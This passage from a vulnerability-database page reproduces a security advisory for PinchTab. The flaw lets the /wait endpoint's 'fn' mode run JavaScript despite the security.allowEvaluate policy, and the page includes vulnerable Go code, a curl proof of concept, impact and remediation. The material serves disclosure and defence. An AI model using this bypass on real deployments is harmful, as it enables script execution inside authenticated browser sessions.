httpx.DisabledEndpointMessage(\"evaluate\", \"security.allowEvaluate\"), false, map[string]any{\n            \"setting\": \"security.allowEvaluate\",\n        })\n        return\n    }\n    // ...\n}\n```\n\nIn the same releases, `/wait` did not apply that guard before evaluating `fn`:\n\n```go\n// internal/handlers/wait.go \u2014 v0.8.5 (vulnerable)\nfunc (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {\n    mode := req.mode()\n    if mode == \"\" {\n        httpx.Error(w, 400, fmt.Errorf(\"one of selector, text, url, load, fn, or ms is required\"))\n        return\n    }\n\n    // No evaluateEnabled() check here in affected releases\n    // ...\n}\n```\n\n**Issue 2 \u2014 `fn` mode evaluated caller-supplied JavaScript directly:**\nThe `fn` branch built executable JavaScript from the request field and passed it to `chromedp.Evaluate`:\n\n```go\n// internal/handlers/wait.go \u2014 v0.8.5 (vulnerable)\ncase \"fn\":\n    js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)\n    matchLabel = \"fn\"\n\n// Poll loop\nevalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, \u0026result))\n```\n\nBecause `req.Fn` was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.\n\n**Issue 3 \u2014 Current worktree contains an unreleased fix:**\nThe current worktree closes this gap by making `fn` mode in `/wait` respect the same `security.allowEvaluate` policy boundary that `/evaluate` already enforced. The underlying non-code wait modes remain available.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`, `v0.8.4`, or `v0.8.5`\n- A configured API token\n- `security.allowEvaluate = false`\n- A reachable tab context, created by the caller or already present\n\n**Step 1 \u2014 Confirm `/evaluate` is blocked by policy**\n\n```bash\ncurl -s -X POST http://localhost:9867/evaluate \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"expression\":\"1+1\"}\u0027\n```\n\nExpected:\n\n```json\n{\n  \"code\": \"evaluate_disabled\"\n}\n```\n\n**Step 2 \u2014 Open a tab**\n\n```bash\ncurl -s -X POST http://localhost:9867/navigate \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"url\":\"https://example.com\"}\u0027\n```\n\nExample result:\n\n```json\n{\n  \"tabId\": \"\u003cTAB_ID\u003e\",\n  \"title\": \"Example Domain\",\n  \"url\": \"https://example.com/\"\n}\n```\n\n**Step 3 \u2014 Execute JavaScript through `/wait` using `fn` mode**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"tabId\":\"\u003cTAB_ID\u003e\",\n    \"fn\":\"(function(){window._poc_executed=true;return true})()\",\n    \"timeout\":5000\n  }\u0027\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 1,\n  \"match\": \"fn\"\n}\n```\n\n**Step 4 \u2014 Verify the side effect**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"tabId\":\"\u003cTAB_ID\u003e\",\n    \"fn\":\"window._poc_executed === true\",\n    \"timeout\":3000\n  }\u0027\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 0,\n  \"match\": \"fn\"\n}\n```\n\n**Observation**\n1. `/evaluate` returns `evaluate_disabled` when `security.allowEvaluate` is off.\n2. `/wait` still evaluates caller-supplied JavaScript through `fn` mode in the affected releases.\n3. The first `/wait` request introduces a side effect in page state.\n4. The second `/wait` request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.\n\n### Impact\n1. Bypass of the explicit `security.allowEvaluate` control in `v0.8.3` through `v0.8.5`.\n2. Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.\n3. Ability to read or modify page state and act within authenticated browser sessions available to that tab context.\n4. Inconsistent security boundaries between `/evaluate` and `/wait`, making the configured execution policy unreliable.\n5. This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.\n\n### Suggested Remediation\n1. Make `fn` mode in `/wait` enforce the same policy check as `/evaluate`.\n2. Keep non-code wait modes available when JavaScript evaluation is disabled.\n3. Add regression coverage so the policy boundary remains consistent across endpoints.",
  "id": "GHSA-w5pc-m664-r62v",
  "modified": "2026-03-27T21:19:00Z",
  "published": "2026-03-24T19:43:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33622"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pinchtab/pinchtab"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33622 (GCVE-0-2026-33622)

FKIE_CVE-2026-33622

GHSA-W5PC-M664-R62V

Summary

Details

PoC

Impact

Suggested Remediation

Tags

Sightings

Nomenclature